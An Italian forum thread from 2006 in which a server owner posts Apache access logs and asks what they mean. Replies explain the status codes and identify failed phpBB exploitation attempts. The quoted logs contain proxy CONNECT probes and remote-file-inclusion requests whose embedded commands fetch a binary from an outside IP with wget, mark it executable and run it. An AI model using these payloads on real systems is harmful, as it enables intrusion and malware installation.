Torna indietro   Hardware Upgrade Forum > Software > Programmazione

Recensione Google Pixel 10a, si migliora poco ma è sempre un'ottima scelta
Recensione Google Pixel 10a, si migliora poco ma è sempre un'ottima scelta
Google ha appena rinnovato la sua celebre serie A con il Pixel 10a, lo smartphone della serie più conveniente se consideriamo il rapporto tra costo e prestazioni. Con il chip Tensor G4, un design raffinato soprattutto sul retro e l'integrazione profonda di Gemini, il colosso di Mountain View promette un'esperienza premium a un prezzo accessibile. E il retro non ha nessuno scalino
6G, da rete che trasporta dati a rete intelligente: Qualcomm accelera al MWC 2026
6G, da rete che trasporta dati a rete intelligente: Qualcomm accelera al MWC 2026
Al MWC Qualcomm annuncia una coalizione industriale per lanciare il 6G entro il 2029 e introduce agenti IA per la gestione autonoma della RAN. Ericsson, presente sul palco, conferma la direzione: le reti del futuro saranno IA-native fin dalla progettazione
CHUWI CoreBook Air alla prova: design premium, buona autonomia e qualche compromesso
CHUWI CoreBook Air alla prova: design premium, buona autonomia e qualche compromesso
CHUWI CoreBook Air è un ultraleggero da 1 kg con Ryzen 5 6600H, display 14" 16:10 e 16 GB LPDDR5. Offre buona portabilità, autonomia discreta e costruzione in alluminio, ma storage PCIe 3.0 e RAM saldata limitano l'espandibilità. A 549 euro sfida brand più noti nella stessa fascia di mercato.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 17-03-2006, 11:04   #1
samu76
Senior Member
 
L'Avatar di samu76
 
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
[apache] analisi log access

spero di non aver toppato sezione

"analizzando" i log del mio pseudo-server apache ho trovato un paio di righe che mi hanno lasciato un po perplesso,
dalle ricerche fatte con san google, credo di aver capito che ci è stato qualcuno che ha tentato di "scannerizzare" il mio server alla ricerca di un proxy da usare.....

ma il dubbio piu grande, sono i numeri in fondo alla riga 200 e 19 il 200 sembra che stia per un "OK" ma il 19?

qui vi posto la riga:

****** - - [16/Mar/2006:14:45:14 +0100] "POST http://******:6667/ HTTP/1.0" 200 19
****** - - [16/Mar/2006:14:45:14 +0100] "CONNECT ******:6667 HTTP/1.0" 200 19

intanto gli ip li ho nascosti, ma dal ping risulta essere un server irc....

quello che vi chiedo è questo:

1. un link o manuale in cui venga spiegato i numeri finali delle righe (200... 19 ... 404 (pagina non trovata credo) etc etc..)
2. in particolare, il 200 e il 19 finale cosa significano?
3. mi devo preoccupare?



P.S.: sul mio server non è installato nessun proxy server

grazie

samu
__________________
<<giovani oggi bagnati, domani forse raffreddati....>>
Papa Giovanni Paolo II - Aprile 1995 Trento
Concluso positivamente con: 055, giankyfava, iceone, carocavallo
samu76 è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 12:16   #2
wgator
Senior Member
 
L'Avatar di wgator
 
Iscritto dal: Mar 2004
Città: Rimini
Messaggi: 10296
Ciao,

forse hai maggiori possibilità di ottenere risposte nella sezione "programmazione" dove hanno più confidenza con Apache et similia
__________________
sometimes they come back *** Life Happens! - (Professionista I.T. - Tecnico Telecomunicazioni)
Latitude E6420
I7 2760QM SSD Crucial M4-512GB --- Tecra R840 I5 2520M SSD Samsung 830-256GB --- Macbook Pro 13,3" I5 2435M SSD Samsung 830-256GB
wgator è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 13:29   #3
cionci
Senior Member
 
L'Avatar di cionci
 
Iscritto dal: Apr 2000
Città: Vicino a Montecatini(Pistoia) Moto:Kawasaki Ninja ZX-9R Scudetti: 29
Messaggi: 53971
Quote:
Originariamente inviato da samu76
****** - - [16/Mar/2006:14:45:14 +0100] "POST http://******:6667/ HTTP/1.0" 200 19
****** - - [16/Mar/2006:14:45:14 +0100] "CONNECT ******:6667 HTTP/1.0" 200 19
mmmmhh....è strana come richiesta... Ed è strana anche la risposta sulla TUA porta 6667 (prova a fare telnet 127.0.0.1 6667, ti si connette ?), 19 è la quantità di byte trasferiti con quella richiesta...
Nota che la porta 6667 è quella standard dei server irc...
cionci è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 14:48   #4
texerasmo
Senior Member
 
Iscritto dal: Feb 2003
Città: Formia
Messaggi: 1545
guardano i file di log del mio apache invece trovo molte richieste sulle seguenti porte
6995 (tantissime)
330
518

chie vuol dire?
texerasmo è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 14:57   #5
samu76
Senior Member
 
L'Avatar di samu76
 
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
@cionci

ho fatto quel che hai detto, connessione rifiutata


@wgator
ti mando un pm, una cosa che ho notato nei log

@tutti gli altri

ho questa fila di log, sembra che qualcuno voglia bucarmi (o lo ha già fatto )


213.191.133.20 - - [17/Mar/2006:12:01:45 +0100] "GET /webcalendar/tools/send_reminders.php?includedir=http://
83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTT
P/1.1" 404 317
213.191.133.20 - - [17/Mar/2006:12:01:47 +0100] "GET /webcalendar/send_reminders.php?includedir=http://83.16.
187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1"
404 311
213.191.133.20 - - [17/Mar/2006:12:01:48 +0100] "GET /webcalendar/tools/send_reminders.phpsend_reminders.php?
includedir=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;ech
o%20YYY;echo| HTTP/1.1" 404 335
213.191.133.20 - - [17/Mar/2006:12:01:49 +0100] "GET /modules/PNphpBB2/includes/functions_admin.phpfunctions_
admin.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20ha
ita;./haita;echo%20YYY;echo| HTTP/1.1" 404 345
213.191.133.20 - - [17/Mar/2006:12:01:50 +0100] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_roo
t_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20
YYY;echo| HTTP/1.1" 404 326
213.191.133.20 - - [17/Mar/2006:12:01:51 +0100] "GET /modules/includes/functions_admin.php?phpbb_root_path=ht
tp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo|
HTTP/1.1" 404 317
213.191.133.20 - - [17/Mar/2006:12:01:52 +0100] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=h
ttp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo
| HTTP/1.1" 404 318
213.191.133.20 - - [17/Mar/2006:12:01:54 +0100] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=h
ttp://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo
| HTTP/1.1" 404 318
213.191.133.20 - - [17/Mar/2006:12:01:55 +0100] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://83
.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/
1.1" 404 310
213.191.133.20 - - [17/Mar/2006:12:01:56 +0100] "GET /phpBB2/admin/admin_styles.php?phpbb_root_path=http://83
.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/
1.1" 404 310
213.191.133.20 - - [17/Mar/2006:12:01:57 +0100] "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.18
7.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/haita;chmod%20744%20haita;./haita;echo%20YYY;echo| HTTP/1.1" 4
04 304

che ne dite?

questa volta ho lasciato gli ip...


ho un forum per quello installato, ma non è phpbb infatti, l'errore 404 dato dai log significa che non han trovato na mazza sul mio server
o no?
__________________
<<giovani oggi bagnati, domani forse raffreddati....>>
Papa Giovanni Paolo II - Aprile 1995 Trento
Concluso positivamente con: 055, giankyfava, iceone, carocavallo

Ultima modifica di samu76 : 17-03-2006 alle 15:17.
samu76 è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 15:05   #6
texerasmo
Senior Member
 
Iscritto dal: Feb 2003
Città: Formia
Messaggi: 1545
analizzando meglio il log ho trovato anche

CONNECT XXXXXXXXXXXX:25 HTTP/1.0" 500 663

questo secondo voi potrebbe essere un tentativo di attacco.
texerasmo è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 15:27   #7
samu76
Senior Member
 
L'Avatar di samu76
 
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
leggendo meglio i log sembra che volevano usarmi per accedere ad altro server...

non mi sembra che ci siano riusciti, anche perchè le cose che cercavano, io non le ho installate (non tutte almeno, e cmq non con un nome che hanno usato)
__________________
<<giovani oggi bagnati, domani forse raffreddati....>>
Papa Giovanni Paolo II - Aprile 1995 Trento
Concluso positivamente con: 055, giankyfava, iceone, carocavallo
samu76 è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 15:39   #8
kingv
Senior Member
 
L'Avatar di kingv
 
Iscritto dal: Jan 2001
Città: Milano
Messaggi: 5707
Quote:
Originariamente inviato da samu76

ho un forum per quello installato, ma non è phpbb infatti, l'errore 404 dato dai log significa che non han trovato na mazza sul mio server
o no?

esatto. stava cercando di sfruttare qualche vulnerabilità di phpbb.
kingv è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 16:01   #9
cionci
Senior Member
 
L'Avatar di cionci
 
Iscritto dal: Apr 2000
Città: Vicino a Montecatini(Pistoia) Moto:Kawasaki Ninja ZX-9R Scudetti: 29
Messaggi: 53971
Sì, quello era un tentativo di usarti per scaricare qualcosa...ma non ci sono riusciti...
cionci è offline   Rispondi citando il messaggio o parte di esso
Old 17-03-2006, 17:11   #10
samu76
Senior Member
 
L'Avatar di samu76
 
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
è sempre utile avere un web server vuoto

scherzo,

lo è in parte


cmq, ancora non riesco a capire i due log che ho postato nel primo messaggio...

in rete non trovo nulla
__________________
<<giovani oggi bagnati, domani forse raffreddati....>>
Papa Giovanni Paolo II - Aprile 1995 Trento
Concluso positivamente con: 055, giankyfava, iceone, carocavallo
samu76 è offline   Rispondi citando il messaggio o parte di esso
Old 18-03-2006, 12:48   #11
samu76
Senior Member
 
L'Avatar di samu76
 
Iscritto dal: Mar 2005
Città: trento
Messaggi: 1318
mi sa che sono stato preso di mira da qualche lamer uff

intanto ho scitto ai 2 isp (asiatici entrambi) servizio abusi, spero che risolvano o che invitino i clienti a controllare i loro log ogni tanto e di prendere le dovute precauzioni...

ho pure scritto ad un terzo (tedesco) sembra che un network scanner cercasse vulnerabilità
ecco parte del log andato male cmq

w00tw00t.at.ISC.SANS.DFind:
__________________
<<giovani oggi bagnati, domani forse raffreddati....>>
Papa Giovanni Paolo II - Aprile 1995 Trento
Concluso positivamente con: 055, giankyfava, iceone, carocavallo
samu76 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Recensione Google Pixel 10a, si migliora poco ma è sempre un'ottima scelta Recensione Google Pixel 10a, si migliora poco ma...
6G, da rete che trasporta dati a rete intelligente: Qualcomm accelera al MWC 2026 6G, da rete che trasporta dati a rete intelligen...
CHUWI CoreBook Air alla prova: design premium, buona autonomia e qualche compromesso CHUWI CoreBook Air alla prova: design premium, b...
Roborock Saros 20: il robot preciso e molto sottile Roborock Saros 20: il robot preciso e molto sott...
ASUS ROG Kithara: quando HIFIMAN incontra il gaming con driver planari da 100mm ASUS ROG Kithara: quando HIFIMAN incontra il gam...
Rocket Lab ha posticipato il lancio del ...
Dalla missione Artemis IV il razzo spazi...
Una delle sonde europee di ESA Proba-3 h...
Un modder fa girare Linux su PS5: GTA V ...
MacBook Neo: nessuna sorpresa nei primi ...
La serie POCO X8 Pro è pronta al ...
Smartphone: 2026 difficile per il mercat...
Star Wars: Knights of the Old Republic R...
Huang, NVIDIA: OpenClaw ha realizzato in...
Annunciano il recupero di 4,8 milioni di...
Oggi degli ottimi auricolari Sony con ca...
Muffa in casa? Questo deumidificatore da...
Sonos Era 100: il punto d'ingresso per u...
"Non stiamo sostituendo nessuno con...
Tutti i robot in offerta ora: prezzi bas...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 20:16.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v